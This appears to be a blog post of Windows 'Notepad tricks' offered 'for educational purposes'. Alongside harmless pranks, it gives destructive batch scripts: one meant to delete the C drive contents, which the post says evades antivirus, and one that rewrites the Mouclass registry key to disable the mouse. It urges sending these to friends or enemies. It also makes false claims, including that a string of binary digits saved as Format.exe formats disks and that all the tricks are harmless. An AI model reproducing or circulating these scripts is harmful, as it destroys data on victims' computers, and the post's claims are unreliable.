Recent Posts

Simple and Effective tricks To Use with Notepad FOR EDUCATIONAL PURPOSES





NOTE: JUST FOR EDUCATIONAL PURPOSES DON’T MISUSE.

#Here it is today I am not going to give you some useful tricks on the computer but will provide you some tricks from an essential part/feature/application of computer i.e: # NOTEPAD.
Notepad, the text editor that comes bundled in Windows is an excellent tool for text editing. But that is not the only thing for which notepad is famous. It is also famous for its tricks and hacks. Here is a roundup of some of the best and coolest tricks that you can try using Notepad.
If you think that Notepad is just a basic text editor, then, you will be amazed by its capabilities. You can use Notepad to create everything from personalized logs to harmless viruses that are incredibly annoying.
#Matrix Falling Code Effect - Notepad CMD (.BAT) Tricks
Inspired by the movie Matrix, this falling code trick is extremely popular on social networking websites. Copy and paste the code given below in Notepad and save the file as "Matrix.bat" or *.bat.
@echo off
 color 02
 :tricks
 echo %random%%random%%random%%random%%random%%random%%random%%random%
 goto tricks
Upon running the bat file, you will see the "Matrix falling code" effect.
#Make Your Keyboard Type (Any) Message Continuously - VBS Trick
This VBS trick can make any of your friend's keyboard type any message continuously. Open Notepad, copy the code given below and save the file as Tricks.vbs or *.vbs. You will need to restart your computer to stop this. Try this after closing all important programs.
Set wshShell = wscript.CreateObject("WScript.Shell")
 do
 wscript.sleep 100
 wshshell.sendkeys "This is a Virus. You have been infected."
 loop
Send this file to your friends as an email attachment to see the fun.
#Create a Harmless Funny Virus with Notepad-Continuously eject CD/DVD drives
This VBS trick will create a code that will continuously eject all your connected Optical drives. If you put them back in, it will pop them out again. Copy this code and paste it in Notepad as Virus.vbs or *.vbs.
Set oWMP = CreateObject("WMPlayer.OCX.7")
 Set colCDROMs = oWMP.cdromCollection
 do
 if colCDROMs.Count >= 1 then
 For i = 0 to colCDROMs.Count - 1
 colCDROMs.Item(i).Eject
 Next
 For i = 0 to colCDROMs.Count - 1
 colCDROMs.Item(i).Eject
 Next
 End If
 wscript.sleep 5000
 loop
Double click to open this file and you will be impressed by this awesome trick.
#Make a Personal Diary(Log) with Notepad (Easter Eggs)
Notepad Diary
You can use this trick to create a personal log with Notepad which will automatically include the current date and time before your note. To do so, open Notepad and type .LOG in capital letters and press Enter. Save the file. Now, every time you open this file, notepad will automatically insert the current time and date before the note. Just enter your note and save the file each time after making an entry.

 All these Notepad tricks are totally harmless and would not harm your PC in any way. To close any of the VBS trick given, open task manager and close the wscript.exe process. These tricks work on Windows 10(sometimes), Windows 8, Windows 7, Windows Vista and Windows XP.
EDIT- Thanks guys for the awesome response I am sure we can hit for 1k and +++
so here are some more bonus codes (for educational purpose don’t misuse)
Make a simple yet very powerful or you can say harmful computer virus using a batch file. No software is required to make this virus, Notepad is enough for it. The good thing about this virus it is not detected by any AntiVirus.
1# Virus
What will this virus do?
You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus.
How to Make the virus?
1. Open Notepad and copy the below code into it.
@Echo off
Del C:\ *.* |y
2. Save this file as virus.bat (Name can be anything but .bat is must)
 3. Now, running this file will delete all the content of C Drive.
Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.
2# Virus
You can send this file to your friend or enemy to format their Hard disk. But please dont try this on your own computer or else you will end up formatting your own computer.
  • Copy the below codes into Notepad.
01001011000111110010010101010101010000011111100000
  • Save the file as Format.exe
  • You have created your virus. Enjoy !!!
3# Virus
This is a batch virus which is harmfull it will disable your mouse so think before trying it on yourself.
  • Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
  • Save this file as virus.bat
  • Done you just created your virus.
EDIT: Thanks guys for the awesome response this my first 1k upvotes feeling very proud and much more happy than that keep Upvoting and also follow.
Bonus tips:
  • Shake your desktop free of clutter (working on windows7)
If you frequently run multiple programs simultaneously, your desktop can get extremely cluttered. This can get annoying if you're working on one program and want to minimize all the other windows -- in previous versions of Windows you had to minimize them individually.
With Windows 7's "shake" feature, though, you can minimize every window except the one in which you're currently working -- in a single step. Click and hold the title bar of the window you want to keep on the desktop; while still holding the title bar, shake it quickly back and forth until all of the other windows minimize to the taskbar. Then let go. To make them return, shake the title bar again.
You can accomplish the same thing by pressing the Window key-Home key combination -- although doing that is not nearly as much fun.
  • Windows 10 tips and tricks: Windows Hello (Available only in latest windows 10-anniversary version)
Hello lets you log in simply by looking at your (Window Hello-compatible) webcam. But now it works with compatible apps that support it, so you don't have to enter a password.
  • Windows 10 tips and tricks: Dark Mode(Available only in latest windows 10-anniversary version)
For late-night use, there’s a new option to apply a dark theme to the Edge browser and other Windows apps. This includes apps such as Mail, Calendar and the Windows Store. Search 'Dark Mode' in the Start menu.
So lets aim for more 1k Upvotes I know its very easy for you and you will
after that I will post more bonus tips….
NOTE : JUST FOR EDUCATIONAL PURPOSES DON’T MISUSE.

Post a Comment

0 Comments